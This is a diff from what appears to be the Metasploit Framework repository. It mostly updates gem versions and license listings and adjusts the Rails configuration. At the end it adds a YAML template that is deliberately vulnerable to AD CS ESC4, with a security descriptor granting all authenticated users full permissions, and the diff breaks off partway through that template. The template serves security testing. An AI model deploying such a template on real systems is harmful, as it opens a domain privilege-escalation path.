      mime-types (>= 3.3, < 4)
      require_all (>= 2, < 4)
      rspec-expectations (~> 3.12)
-      uuid (>= 2.3, < 3)
-    arel-helpers (2.15.0)
-      activerecord (>= 3.1.0, < 8)
+    arel-helpers (2.16.0)
+      activerecord (>= 3.1.0, < 8.1)
    ast (2.4.2)
-    aws-eventstream (1.3.0)
-    aws-partitions (1.999.0)
-    aws-sdk-core (3.211.0)
+    aws-eventstream (1.3.2)
+    aws-partitions (1.1065.0)
+    aws-sdk-core (3.220.1)
      aws-eventstream (~> 1, >= 1.3.0)
      aws-partitions (~> 1, >= 1.992.0)
      aws-sigv4 (~> 1.9)
+      base64
      jmespath (~> 1, >= 1.6.1)
-    aws-sdk-ec2 (1.486.0)
-      aws-sdk-core (~> 3, >= 3.210.0)
+    aws-sdk-ec2 (1.511.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sdk-ec2instanceconnect (1.52.0)
-      aws-sdk-core (~> 3, >= 3.210.0)
+    aws-sdk-ec2instanceconnect (1.55.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sdk-iam (1.112.0)
-      aws-sdk-core (~> 3, >= 3.210.0)
+    aws-sdk-iam (1.119.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sdk-kms (1.95.0)
-      aws-sdk-core (~> 3, >= 3.210.0)
+    aws-sdk-kms (1.99.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sdk-s3 (1.169.0)
-      aws-sdk-core (~> 3, >= 3.210.0)
+    aws-sdk-s3 (1.182.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sdk-kms (~> 1)
      aws-sigv4 (~> 1.5)
-    aws-sdk-ssm (1.183.0)
-      aws-sdk-core (~> 3, >= 3.210.0)
+    aws-sdk-ssm (1.191.0)
+      aws-sdk-core (~> 3, >= 3.216.0)
      aws-sigv4 (~> 1.5)
-    aws-sigv4 (1.10.1)
+    aws-sigv4 (1.11.0)
      aws-eventstream (~> 1, >= 1.0.2)
    base64 (0.2.0)
    bcrypt (3.1.20)
    bcrypt_pbkdf (1.1.1)
-    bigdecimal (3.1.8)
+    benchmark (0.4.0)
+    bigdecimal (3.1.9)
    bindata (2.4.15)
    bootsnap (1.18.4)
      msgpack (~> 1.2)
-    bson (5.0.1)
+    bson (5.0.2)
    builder (3.3.0)
    byebug (11.1.3)
    chunky_png (1.4.0)
    coderay (1.1.3)
    concurrent-ruby (1.3.4)
+    connection_pool (2.5.0)
    cookiejar (0.3.4)
    crass (1.0.6)
-    csv (3.3.0)
+    csv (3.3.2)
    daemons (1.4.1)
-    date (3.3.4)
+    date (3.4.1)
    debug (1.8.0)
      irb (>= 1.5.0)
      reline (>= 0.3.1)
-    diff-lcs (1.5.1)
-    dnsruby (1.72.2)
+    diff-lcs (1.6.0)
+    dnsruby (1.72.4)
+      base64 (~> 0.2.0)
+      logger (~> 1.6.5)
      simpleidn (~> 0.2.1)
    docile (1.4.1)
    domain_name (0.6.20240107)
@@ -222,10 +243,10 @@ GEM
    em-socksify (0.3.3)
      base64
      eventmachine (>= 1.0.0.beta.4)
-    erubi (1.13.0)
+    erubi (1.13.1)
    eventmachine (1.2.7)
-    factory_bot (6.5.0)
-      activesupport (>= 5.0.0)
+    factory_bot (6.5.1)
+      activesupport (>= 6.1.0)
    factory_bot_rails (6.4.4)
      factory_bot (~> 6.5)
      railties (>= 5.0.0)
@@ -242,8 +263,10 @@ GEM
      eventmachine (>= 0.12.0)
      websocket-driver (>= 0.5.1)
    ffi (1.16.3)
+    fiddle (1.1.6)
    filesize (0.2.0)
    fivemat (1.3.7)
+    forwardable (1.3.3)
    getoptlong (0.2.1)
    gssapi (1.3.1)
      ffi (>= 1.0.1)
@@ -255,38 +278,38 @@ GEM
    hrr_rb_ssh-ed25519 (0.4.2)
      ed25519 (~> 1.2)
      hrr_rb_ssh (>= 0.4)
-    http-cookie (1.0.7)
+    http-cookie (1.0.8)
      domain_name (~> 0.5)
    http_parser.rb (0.8.0)
-    httpclient (2.8.3)
-    i18n (1.14.6)
+    httpclient (2.9.0)
+      mutex_m
+    i18n (1.14.7)
      concurrent-ruby (~> 1.0)
-    io-console (0.7.2)
+    io-console (0.8.0)
+    ipaddr (1.2.7)
    irb (1.7.4)
      reline (>= 0.3.6)
    jmespath (1.6.2)
    jsobfu (0.4.2)
      rkelly-remix
-    json (2.7.5)
-    language_server-protocol (3.17.0.3)
+    json (2.10.2)
+    language_server-protocol (3.17.0.4)
    little-plugger (1.1.4)
-    logger (1.6.1)
+    logger (1.6.6)
    logging (2.4.0)
      little-plugger (~> 1.1)
      multi_json (~> 1.14)
-    loofah (2.23.1)
+    loofah (2.24.0)
      crass (~> 1.0.2)
      nokogiri (>= 1.12.0)
-    macaddr (1.7.2)
-      systemu (~> 2.6.5)
    memory_profiler (1.1.0)
    metasm (1.0.5)
-    metasploit-concern (5.0.3)
+    metasploit-concern (5.0.4)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
      zeitwerk
-    metasploit-credential (6.0.11)
+    metasploit-credential (6.0.14)
      metasploit-concern
      metasploit-model
      metasploit_data_models (>= 5.0.0)
@@ -296,12 +319,12 @@ GEM
      rex-socket
      rubyntlm
      rubyzip
-    metasploit-model (5.0.2)
+    metasploit-model (5.0.3)
      activemodel (~> 7.0)
      activesupport (~> 7.0)
      railties (~> 7.0)
    metasploit-payloads (2.0.189)
-    metasploit_data_models (6.0.5)
+    metasploit_data_models (6.0.9)
      activerecord (~> 7.0)
      activesupport (~> 7.0)
      arel-helpers
@@ -316,17 +339,17 @@ GEM
    mime-types (3.6.0)
      logger
      mime-types-data (~> 3.2015)
-    mime-types-data (3.2024.1001)
-    mini_portile2 (2.8.7)
-    minitest (5.25.1)
+    mime-types-data (3.2025.0304)
+    mini_portile2 (2.8.8)
+    minitest (5.25.5)
    mqtt (0.6.0)
    msgpack (1.6.1)
    multi_json (1.15.0)
    mustermann (3.0.3)
      ruby2_keywords (~> 0.0.1)
-    mutex_m (0.2.0)
+    mutex_m (0.3.0)
    nessus_rest (0.1.6)
-    net-imap (0.5.0)
+    net-imap (0.5.6)
      date
      net-protocol
    net-ldap (0.19.0)
@@ -334,13 +357,13 @@ GEM
      timeout
    net-sftp (4.0.0)
      net-ssh (>= 5.0.0, < 8.0.0)
-    net-smtp (0.5.0)
+    net-smtp (0.5.1)
      net-protocol
    net-ssh (7.3.0)
    network_interface (0.0.4)
    nexpose (7.3.0)
    nio4r (2.7.4)
-    nokogiri (1.16.7)
+    nokogiri (1.18.3)
      mini_portile2 (~> 2.8.2)
      racc (~> 1.4)
    nori (2.7.1)
@@ -351,16 +374,17 @@ GEM
    openssl-ccm (1.2.3)
    openssl-cmac (2.0.2)
    openvas-omp (0.0.4)
+    ostruct (0.6.1)
    packetfu (2.0.0)
      pcaprub (~> 0.13.1)
    parallel (1.26.3)
-    parser (3.3.5.0)
+    parser (3.3.7.1)
      ast (~> 2.4.1)
      racc
    patch_finder (1.0.2)
    pcaprub (0.13.3)
-    pdf-reader (2.12.0)
-      Ascii85 (~> 1.0)
+    pdf-reader (2.14.1)
+      Ascii85 (>= 1.0, < 3.0, != 2.0.0)
      afm (~> 0.2.1)
      hashery (~> 2.0)
      ruby-rc4
@@ -373,96 +397,108 @@ GEM
      byebug (~> 11.0)
      pry (>= 0.13, < 0.15)
    public_suffix (6.0.1)
-    puma (6.4.3)
+    puma (6.6.0)
      nio4r (~> 2.0)
    racc (1.8.1)
-    rack (2.2.10)
+    rack (2.2.13)
    rack-protection (3.2.0)
      base64 (>= 0.1.0)
      rack (~> 2.2, >= 2.2.4)
-    rack-test (2.1.0)
+    rack-session (1.0.2)
+      rack (< 3)
+    rack-test (2.2.0)
      rack (>= 1.3)
+    rackup (1.0.1)
+      rack (< 3)
+      webrick
    rails-dom-testing (2.2.0)
      activesupport (>= 5.0.0)
      minitest
      nokogiri (>= 1.6)
-    rails-html-sanitizer (1.6.0)
+    rails-html-sanitizer (1.6.2)
      loofah (~> 2.21)
-      nokogiri (~> 1.14)
-    railties (7.0.8.6)
-      actionpack (= 7.0.8.6)
-      activesupport (= 7.0.8.6)
-      method_source
+      nokogiri (>= 1.15.7, != 1.16.7, != 1.16.6, != 1.16.5, != 1.16.4, != 1.16.3, != 1.16.2, != 1.16.1, != 1.16.0.rc1, != 1.16.0)
+    railties (7.1.5.1)
+      actionpack (= 7.1.5.1)
+      activesupport (= 7.1.5.1)
+      irb
+      rackup (>= 1.0.0)
      rake (>= 12.2)
-      thor (~> 1.0)
-      zeitwerk (~> 2.5)
+      thor (~> 1.0, >= 1.2.2)
+      zeitwerk (~> 2.6)
    rainbow (3.1.1)
    rake (13.2.1)
-    rasn1 (0.13.0)
+    rasn1 (0.14.0)
      strptime (~> 0.2.5)
    rb-readline (0.5.5)
-    recog (3.1.11)
+    recog (3.1.14)
      nokogiri
-    redcarpet (3.6.0)
-    regexp_parser (2.9.2)
-    reline (0.5.10)
+    redcarpet (3.6.1)
+    regexp_parser (2.10.0)
+    reline (0.6.0)
      io-console (~> 0.5)
    require_all (3.0.0)
-    rex-arch (0.1.16)
+    rex-arch (0.1.18)
      rex-text
-    rex-bin_tools (0.1.9)
+    rex-bin_tools (0.1.10)
      metasm
      rex-arch
      rex-core
      rex-struct2
      rex-text
-    rex-core (0.1.32)
-    rex-encoder (0.1.7)
+    rex-core (0.1.34)
+    rex-encoder (0.1.8)
      metasm
      rex-arch
      rex-text
-    rex-exploitation (0.1.40)
+    rex-exploitation (0.1.41)
      jsobfu
      metasm
      rex-arch
      rex-encoder
      rex-text
      rexml
-    rex-java (0.1.7)
-    rex-mime (0.1.8)
+    rex-java (0.1.8)
+    rex-mime (0.1.11)
      rex-text
-    rex-nop (0.1.3)
+    rex-nop (0.1.4)
      rex-arch
-    rex-ole (0.1.8)
+    rex-ole (0.1.9)
      rex-text
-    rex-powershell (0.1.100)
+    rex-powershell (0.1.101)
      rex-random_identifier
      rex-text
      ruby-rc4
-    rex-random_identifier (0.1.13)
+    rex-random_identifier (0.1.15)
      rex-text
-    rex-registry (0.1.5)
-    rex-rop_builder (0.1.5)
+    rex-registry (0.1.6)
+    rex-rop_builder (0.1.6)
      metasm
      rex-core
      rex-text
-    rex-socket (0.1.57)
+    rex-socket (0.1.61)
+      dnsruby
      rex-core
-    rex-sslscan (0.1.10)
+    rex-sslscan (0.1.12)
      rex-core
      rex-socket
      rex-text
-    rex-struct2 (0.1.4)
-    rex-text (0.2.59)
-    rex-zip (0.1.5)
+    rex-struct2 (0.1.5)
+    rex-text (0.2.61)
+      bigdecimal
+    rex-zip (0.1.6)
      rex-text
-    rexml (3.3.9)
+    rexml (3.4.1)
+    rinda (0.2.0)
+      drb
+      forwardable
+      ipaddr
    rkelly-remix (0.0.7)
    rspec (3.13.0)
      rspec-core (~> 3.13.0)
      rspec-expectations (~> 3.13.0)
      rspec-mocks (~> 3.13.0)
-    rspec-core (3.13.2)
+    rspec-core (3.13.3)
      rspec-support (~> 3.13.0)
    rspec-expectations (3.13.3)
      diff-lcs (>= 1.2.0, < 2.0)
@@ -470,7 +506,7 @@ GEM
    rspec-mocks (3.13.2)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.13.0)
-    rspec-rails (7.0.1)
+    rspec-rails (7.1.1)
      actionpack (>= 7.0)
      activesupport (>= 7.0)
      railties (>= 7.0)
@@ -480,7 +516,7 @@ GEM
      rspec-support (~> 3.13)
    rspec-rerun (1.1.0)
      rspec (~> 3.0)
-    rspec-support (3.13.1)
+    rspec-support (3.13.2)
    rubocop (1.67.0)
      json (~> 2.3)
      language_server-protocol (>= 3.17.0)
@@ -491,15 +527,15 @@ GEM
      rubocop-ast (>= 1.32.2, < 2.0)
      ruby-progressbar (~> 1.7)
      unicode-display_width (>= 2.4.0, < 3.0)
-    rubocop-ast (1.33.0)
+    rubocop-ast (1.38.1)
      parser (>= 3.3.1.0)
    ruby-macho (4.1.0)
-    ruby-mysql (4.1.0)
+    ruby-mysql (4.2.0)
    ruby-prof (1.4.2)
    ruby-progressbar (1.13.0)
    ruby-rc4 (0.1.5)
    ruby2_keywords (0.0.5)
-    ruby_smb (3.3.13)
+    ruby_smb (3.3.15)
      bindata (= 2.4.15)
      openssl-ccm
      openssl-cmac
@@ -507,10 +543,11 @@ GEM
      windows_error (>= 0.1.4)
    rubyntlm (0.6.5)
      base64
-    rubyzip (2.3.2)
+    rubyzip (2.4.1)
    sawyer (0.9.2)
      addressable (>= 2.3.5)
      faraday (>= 0.17.3, < 3)
+    securerandom (0.4.1)
    simplecov (0.18.2)
      docile (~> 1.1)
      simplecov-html (~> 0.11)
@@ -526,30 +563,28 @@ GEM
    sshkey (3.0.0)
    strptime (0.2.5)
    swagger-blocks (3.0.0)
-    systemu (2.6.5)
-    test-prof (1.4.2)
+    test-prof (1.4.4)
    thin (1.8.2)
      daemons (~> 1.0, >= 1.0.9)
      eventmachine (~> 1.0, >= 1.0.4)
      rack (>= 1, < 3)
    thor (1.3.2)
-    tilt (2.4.0)
+    tilt (2.6.0)
    timecop (0.9.10)
-    timeout (0.4.1)
+    timeout (0.4.3)
    ttfunk (1.8.0)
      bigdecimal (~> 3.1)
    tzinfo (2.0.6)
      concurrent-ruby (~> 1.0)
-    tzinfo-data (1.2024.2)
+    tzinfo-data (1.2025.1)
      tzinfo (>= 1.0.0)
    unicode-display_width (2.6.0)
    unix-crypt (1.3.1)
-    uuid (2.3.9)
-      macaddr (~> 1.0)
    warden (1.2.9)
      rack (>= 2.0.9)
-    webrick (1.8.2)
-    websocket-driver (0.7.6)
+    webrick (1.9.1)
+    websocket-driver (0.7.7)
+      base64
      websocket-extensions (>= 0.1.0)
    websocket-extensions (0.1.5)
    win32api (0.1.0)
@@ -570,7 +605,7 @@ GEM
    xmlrpc (0.3.3)
      webrick
    yard (0.9.37)
-    zeitwerk (2.6.18)
+    zeitwerk (2.7.2)

 PLATFORMS
  ruby
@@ -588,7 +623,7 @@ DEPENDENCIES
  redcarpet
  rspec-rails
  rspec-rerun
-  rubocop
+  rubocop (= 1.67.0)
  ruby-prof (= 1.4.2)
  simplecov (= 0.18.2)
  test-prof
@@ -2,7 +2,7 @@ Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
 Source: https://www.metasploit.com/

 Files: *
-Copyright: 2006-2020, Rapid7, Inc.
+Copyright: 2006-2025, Rapid7, Inc.
 License: BSD-3-clause

 # The Metasploit Framework is provided under the 3-clause BSD license provided
@@ -1,49 +1,51 @@
 This file is auto-generated by tools/dev/update_gem_licenses.sh
-Ascii85, 1.1.1, MIT
+Ascii85, 2.0.1, MIT
 aarch64, 2.1.0, "Apache 2.0"
 abbrev, 0.1.2, "ruby, Simplified BSD"
-actionpack, 7.0.8.6, MIT
-actionview, 7.0.8.6, MIT
-activemodel, 7.0.8.6, MIT
-activerecord, 7.0.8.6, MIT
-activesupport, 7.0.8.6, MIT
+actionpack, 7.1.5.1, MIT
+actionview, 7.1.5.1, MIT
+activemodel, 7.1.5.1, MIT
+activerecord, 7.1.5.1, MIT
+activesupport, 7.1.5.1, MIT
 addressable, 2.8.7, "Apache 2.0"
 afm, 0.2.2, MIT
-allure-rspec, 2.24.5, "Apache 2.0"
-allure-ruby-commons, 2.24.5, "Apache 2.0"
-arel-helpers, 2.15.0, MIT
+allure-rspec, 2.26.0, "Apache 2.0"
+allure-ruby-commons, 2.26.0, "Apache 2.0"
+arel-helpers, 2.16.0, MIT
 ast, 2.4.2, MIT
-aws-eventstream, 1.3.0, "Apache 2.0"
-aws-partitions, 1.999.0, "Apache 2.0"
-aws-sdk-core, 3.211.0, "Apache 2.0"
-aws-sdk-ec2, 1.486.0, "Apache 2.0"
-aws-sdk-ec2instanceconnect, 1.52.0, "Apache 2.0"
-aws-sdk-iam, 1.112.0, "Apache 2.0"
-aws-sdk-kms, 1.95.0, "Apache 2.0"
-aws-sdk-s3, 1.169.0, "Apache 2.0"
-aws-sdk-ssm, 1.183.0, "Apache 2.0"
-aws-sigv4, 1.10.1, "Apache 2.0"
+aws-eventstream, 1.3.2, "Apache 2.0"
+aws-partitions, 1.1065.0, "Apache 2.0"
+aws-sdk-core, 3.220.1, "Apache 2.0"
+aws-sdk-ec2, 1.511.0, "Apache 2.0"
+aws-sdk-ec2instanceconnect, 1.55.0, "Apache 2.0"
+aws-sdk-iam, 1.119.0, "Apache 2.0"
+aws-sdk-kms, 1.99.0, "Apache 2.0"
+aws-sdk-s3, 1.182.0, "Apache 2.0"
+aws-sdk-ssm, 1.191.0, "Apache 2.0"
+aws-sigv4, 1.11.0, "Apache 2.0"
 base64, 0.2.0, "ruby, Simplified BSD"
 bcrypt, 3.1.20, MIT
 bcrypt_pbkdf, 1.1.1, MIT
-bigdecimal, 3.1.8, "ruby, Simplified BSD"
+benchmark, 0.4.0, "ruby, Simplified BSD"
+bigdecimal, 3.1.9, "ruby, Simplified BSD"
 bindata, 2.4.15, "Simplified BSD"
 bootsnap, 1.18.4, MIT
-bson, 5.0.1, "Apache 2.0"
+bson, 5.0.2, "Apache 2.0"
 builder, 3.3.0, MIT
 bundler, 2.5.10, MIT
 byebug, 11.1.3, "Simplified BSD"
 chunky_png, 1.4.0, MIT
 coderay, 1.1.3, MIT
 concurrent-ruby, 1.3.4, MIT
+connection_pool, 2.5.0, MIT
 cookiejar, 0.3.4, "Simplified BSD"
 crass, 1.0.6, MIT
-csv, 3.3.0, "ruby, Simplified BSD"
+csv, 3.3.2, "ruby, Simplified BSD"
 daemons, 1.4.1, MIT
-date, 3.3.4, "ruby, Simplified BSD"
+date, 3.4.1, "ruby, Simplified BSD"
 debug, 1.8.0, "ruby, Simplified BSD"
-diff-lcs, 1.5.1, "MIT, Artistic-2.0, GPL-2.0-or-later"
-dnsruby, 1.72.2, "Apache 2.0"
+diff-lcs, 1.6.0, "MIT, Artistic-1.0-Perl, GPL-2.0-or-later"
+dnsruby, 1.72.4, "Apache 2.0"
 docile, 1.4.1, MIT
 domain_name, 0.6.20240107, "Simplified BSD, New BSD, Mozilla Public License 2.0"
 drb, 2.2.1, "ruby, Simplified BSD"
@@ -51,9 +53,9 @@ ed25519, 1.3.0, MIT
 elftools, 1.3.1, MIT
 em-http-request, 1.1.7, MIT
 em-socksify, 0.3.3, MIT
-erubi, 1.13.0, MIT
+erubi, 1.13.1, MIT
 eventmachine, 1.2.7, "ruby, GPL-2.0"
-factory_bot, 6.5.0, MIT
+factory_bot, 6.5.1, MIT
 factory_bot_rails, 6.4.4, MIT
 faker, 3.5.1, MIT
 faraday, 2.7.11, MIT
@@ -61,130 +63,137 @@ faraday-net_http, 3.0.2, MIT
 faraday-retry, 2.2.1, MIT
 faye-websocket, 0.11.3, "Apache 2.0"
 ffi, 1.16.3, "New BSD"
+fiddle, 1.1.6, "ruby, Simplified BSD"
 filesize, 0.2.0, MIT
 fivemat, 1.3.7, MIT
+forwardable, 1.3.3, "ruby, Simplified BSD"
 getoptlong, 0.2.1, "ruby, Simplified BSD"
 gssapi, 1.3.1, MIT
 gyoku, 1.4.0, MIT
 hashery, 2.1.2, "Simplified BSD"
 hrr_rb_ssh, 0.4.2, "Apache 2.0"
 hrr_rb_ssh-ed25519, 0.4.2, "Apache 2.0"
-http-cookie, 1.0.7, MIT
+http-cookie, 1.0.8, MIT
 http_parser.rb, 0.8.0, MIT
-httpclient, 2.8.3, ruby
-i18n, 1.14.6, MIT
-io-console, 0.7.2, "ruby, Simplified BSD"
+httpclient, 2.9.0, ruby
+i18n, 1.14.7, MIT
+io-console, 0.8.0, "ruby, Simplified BSD"
+ipaddr, 1.2.7, "ruby, Simplified BSD"
 irb, 1.7.4, "ruby, Simplified BSD"
 jmespath, 1.6.2, "Apache 2.0"
 jsobfu, 0.4.2, "New BSD"
-json, 2.7.5, ruby
-language_server-protocol, 3.17.0.3, MIT
+json, 2.10.2, ruby
+language_server-protocol, 3.17.0.4, MIT
 little-plugger, 1.1.4, MIT
-logger, 1.6.1, "ruby, Simplified BSD"
+logger, 1.6.6, "ruby, Simplified BSD"
 logging, 2.4.0, MIT
-loofah, 2.23.1, MIT
-macaddr, 1.7.2, ruby
+loofah, 2.24.0, MIT
 memory_profiler, 1.1.0, MIT
 metasm, 1.0.5, LGPL-2.1
-metasploit-concern, 5.0.3, "New BSD"
-metasploit-credential, 6.0.11, "New BSD"
-metasploit-framework, 6.4.40, "New BSD"
-metasploit-model, 5.0.2, "New BSD"
+metasploit-concern, 5.0.4, "New BSD"
+metasploit-credential, 6.0.14, "New BSD"
+metasploit-framework, 6.4.62, "New BSD"
+metasploit-model, 5.0.3, "New BSD"
 metasploit-payloads, 2.0.189, "3-clause (or ""modified"") BSD"
-metasploit_data_models, 6.0.5, "New BSD"
+metasploit_data_models, 6.0.9, "New BSD"
 metasploit_payloads-mettle, 1.0.35, "3-clause (or ""modified"") BSD"
 method_source, 1.1.0, MIT
 mime-types, 3.6.0, MIT
-mime-types-data, 3.2024.1001, MIT
-mini_portile2, 2.8.7, MIT
-minitest, 5.25.1, MIT
+mime-types-data, 3.2025.0304, MIT
+mini_portile2, 2.8.8, MIT
+minitest, 5.25.5, MIT
 mqtt, 0.6.0, MIT
 msgpack, 1.6.1, "Apache 2.0"
 multi_json, 1.15.0, MIT
 mustermann, 3.0.3, MIT
-mutex_m, 0.2.0, "ruby, Simplified BSD"
+mutex_m, 0.3.0, "ruby, Simplified BSD"
 nessus_rest, 0.1.6, MIT
-net-imap, 0.5.0, "ruby, Simplified BSD"
+net-imap, 0.5.6, "ruby, Simplified BSD"
 net-ldap, 0.19.0, MIT
 net-protocol, 0.2.2, "ruby, Simplified BSD"
 net-sftp, 4.0.0, MIT
-net-smtp, 0.5.0, "ruby, Simplified BSD"
+net-smtp, 0.5.1, "ruby, Simplified BSD"
 net-ssh, 7.3.0, MIT
 network_interface, 0.0.4, MIT
 nexpose, 7.3.0, "New BSD"
 nio4r, 2.7.4, "MIT, Simplified BSD"
-nokogiri, 1.16.7, MIT
+nokogiri, 1.18.3, MIT
 nori, 2.7.1, MIT
 octokit, 4.25.1, MIT
 openssl-ccm, 1.2.3, MIT
 openssl-cmac, 2.0.2, MIT
 openvas-omp, 0.0.4, MIT
+ostruct, 0.6.1, "ruby, Simplified BSD"
 packetfu, 2.0.0, "New BSD"
 parallel, 1.26.3, MIT
-parser, 3.3.5.0, MIT
+parser, 3.3.7.1, MIT
 patch_finder, 1.0.2, "New BSD"
 pcaprub, 0.13.3, LGPL-2.1
-pdf-reader, 2.12.0, MIT
+pdf-reader, 2.14.1, MIT
 pg, 1.5.9, "Simplified BSD"
 pry, 0.14.2, MIT
 pry-byebug, 3.10.1, MIT
 public_suffix, 6.0.1, MIT
-puma, 6.4.3, "New BSD"
+puma, 6.6.0, "New BSD"
 racc, 1.8.1, "ruby, Simplified BSD"
-rack, 2.2.10, MIT
+rack, 2.2.13, MIT
 rack-protection, 3.2.0, MIT
-rack-test, 2.1.0, MIT
+rack-session, 1.0.2, MIT
+rack-test, 2.2.0, MIT
+rackup, 1.0.1, MIT
 rails-dom-testing, 2.2.0, MIT
-rails-html-sanitizer, 1.6.0, MIT
-railties, 7.0.8.6, MIT
+rails-html-sanitizer, 1.6.2, MIT
+railties, 7.1.5.1, MIT
 rainbow, 3.1.1, MIT
 rake, 13.2.1, MIT
-rasn1, 0.13.0, MIT
+rasn1, 0.14.0, MIT
 rb-readline, 0.5.5, BSD
-recog, 3.1.11, unknown
-redcarpet, 3.6.0, MIT
-regexp_parser, 2.9.2, MIT
-reline, 0.5.10, ruby
+recog, 3.1.14, unknown
+redcarpet, 3.6.1, MIT
+regexp_parser, 2.10.0, MIT
+reline, 0.6.0, ruby
 require_all, 3.0.0, MIT
-rex-arch, 0.1.16, "New BSD"
-rex-bin_tools, 0.1.9, "New BSD"
-rex-core, 0.1.32, "New BSD"
-rex-encoder, 0.1.7, "New BSD"
-rex-exploitation, 0.1.40, "New BSD"
-rex-java, 0.1.7, "New BSD"
-rex-mime, 0.1.8, "New BSD"
-rex-nop, 0.1.3, "New BSD"
-rex-ole, 0.1.8, "New BSD"
-rex-powershell, 0.1.100, "New BSD"
-rex-random_identifier, 0.1.13, "New BSD"
-rex-registry, 0.1.5, "New BSD"
-rex-rop_builder, 0.1.5, "New BSD"
-rex-socket, 0.1.57, "New BSD"
-rex-sslscan, 0.1.10, "New BSD"
-rex-struct2, 0.1.4, "New BSD"
-rex-text, 0.2.59, "New BSD"
-rex-zip, 0.1.5, "New BSD"
-rexml, 3.3.9, "Simplified BSD"
+rex-arch, 0.1.18, "New BSD"
+rex-bin_tools, 0.1.10, "New BSD"
+rex-core, 0.1.33, "New BSD"
+rex-encoder, 0.1.8, "New BSD"
+rex-exploitation, 0.1.41, "New BSD"
+rex-java, 0.1.8, "New BSD"
+rex-mime, 0.1.11, "New BSD"
+rex-nop, 0.1.4, "New BSD"
+rex-ole, 0.1.9, "New BSD"
+rex-powershell, 0.1.101, "New BSD"
+rex-random_identifier, 0.1.15, "New BSD"
+rex-registry, 0.1.6, "New BSD"
+rex-rop_builder, 0.1.6, "New BSD"
+rex-socket, 0.1.60, "New BSD"
+rex-sslscan, 0.1.11, "New BSD"
+rex-struct2, 0.1.5, "New BSD"
+rex-text, 0.2.60, "New BSD"
+rex-zip, 0.1.6, "New BSD"
+rexml, 3.4.1, "Simplified BSD"
+rinda, 0.2.0, "ruby, Simplified BSD"
 rkelly-remix, 0.0.7, MIT
 rspec, 3.13.0, MIT
-rspec-core, 3.13.2, MIT
+rspec-core, 3.13.3, MIT
 rspec-expectations, 3.13.3, MIT
 rspec-mocks, 3.13.2, MIT
-rspec-rails, 7.0.1, MIT
+rspec-rails, 7.1.1, MIT
 rspec-rerun, 1.1.0, MIT
-rspec-support, 3.13.1, MIT
+rspec-support, 3.13.2, MIT
 rubocop, 1.67.0, MIT
-rubocop-ast, 1.33.0, MIT
+rubocop-ast, 1.38.1, MIT
 ruby-macho, 4.1.0, MIT
-ruby-mysql, 4.1.0, MIT
+ruby-mysql, 4.2.0, MIT
 ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.13.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.3.13, "New BSD"
+ruby_smb, 3.3.15, "New BSD"
 rubyntlm, 0.6.5, MIT
-rubyzip, 2.3.2, "Simplified BSD"
+rubyzip, 2.4.1, "Simplified BSD"
 sawyer, 0.9.2, MIT
+securerandom, 0.4.1, "ruby, Simplified BSD"
 simplecov, 0.18.2, MIT
 simplecov-html, 0.13.1, MIT
 simpleidn, 0.2.3, MIT
@@ -193,22 +202,20 @@ sqlite3, 1.7.3, "New BSD"
 sshkey, 3.0.0, MIT
 strptime, 0.2.5, "Simplified BSD"
 swagger-blocks, 3.0.0, MIT
-systemu, 2.6.5, ruby
-test-prof, 1.4.2, MIT
+test-prof, 1.4.4, MIT
 thin, 1.8.2, "GPL-2.0+, ruby"
 thor, 1.3.2, MIT
-tilt, 2.4.0, MIT
+tilt, 2.6.0, MIT
 timecop, 0.9.10, MIT
-timeout, 0.4.1, "ruby, Simplified BSD"
+timeout, 0.4.3, "ruby, Simplified BSD"
 ttfunk, 1.8.0, "Nonstandard, GPL-2.0-only, GPL-3.0-only"
 tzinfo, 2.0.6, MIT
-tzinfo-data, 1.2024.2, MIT
+tzinfo-data, 1.2025.1, MIT
 unicode-display_width, 2.6.0, MIT
 unix-crypt, 1.3.1, 0BSD
-uuid, 2.3.9, MIT
 warden, 1.2.9, MIT
-webrick, 1.8.2, "ruby, Simplified BSD"
-websocket-driver, 0.7.6, "Apache 2.0"
+webrick, 1.9.1, "ruby, Simplified BSD"
+websocket-driver, 0.7.7, "Apache 2.0"
 websocket-extensions, 0.1.5, "Apache 2.0"
 win32api, 0.1.0, unknown
 windows_error, 0.1.5, BSD
@@ -216,4 +223,4 @@ winrm, 2.3.9, "Apache 2.0"
 xdr, 3.0.3, "Apache 2.0"
 xmlrpc, 0.3.3, "ruby, Simplified BSD"
 yard, 0.9.37, MIT
-zeitwerk, 2.6.18, MIT
+zeitwerk, 2.7.2, MIT
@@ -41,18 +41,9 @@ module Metasploit
      config.paths['config/database'] = [Metasploit::Framework::Database.configurations_pathname.try(:to_path)]
      config.autoloader = :zeitwerk

-      case Rails.env
-      when "development"
-        config.eager_load = false
-      when "test"
-        config.eager_load = false
-      when "production"
-        config.eager_load = false
-      end
+      config.load_defaults 7.1

-      if ActiveRecord.respond_to?(:legacy_connection_handling=)
-        ActiveRecord.legacy_connection_handling = false
-      end
+      config.eager_load = false
    end
  end
 end
@@ -10,6 +10,8 @@ info:
  x-cortex-type: service
  x-cortex-domain-parents:
  - tag: metasploit
+  x-cortex-groups:
+  - exposure:external-ship
 openapi: 3.0.1
 servers:
 - url: "/"
@@ -0,0 +1,30 @@
+---
+# Creates a template that will be vulnerable to ESC4 (certificate has weak edit permissions).
+# Fields are based on the SubCA template. For field descriptions,
+# see: https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-crtd/b2df0c1c-8657-4684-bb5f-4f6b89c8d434
+showInAdvancedViewOnly: 'TRUE'
+# this security descriptor grants all permissions to all authenticated users (this is what makes the template vulnerable to ESC4)
+nTSecurityDescriptor: D:PAI(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;AU)
+flags: 0
+pKIDefaultKeySpec: 2
+pKIKeyUsage: !binary |-
+  hgA=
+pKIMaxIssuingDepth: 0
+pKICriticalExtensions:
+  - 2.5.29.19
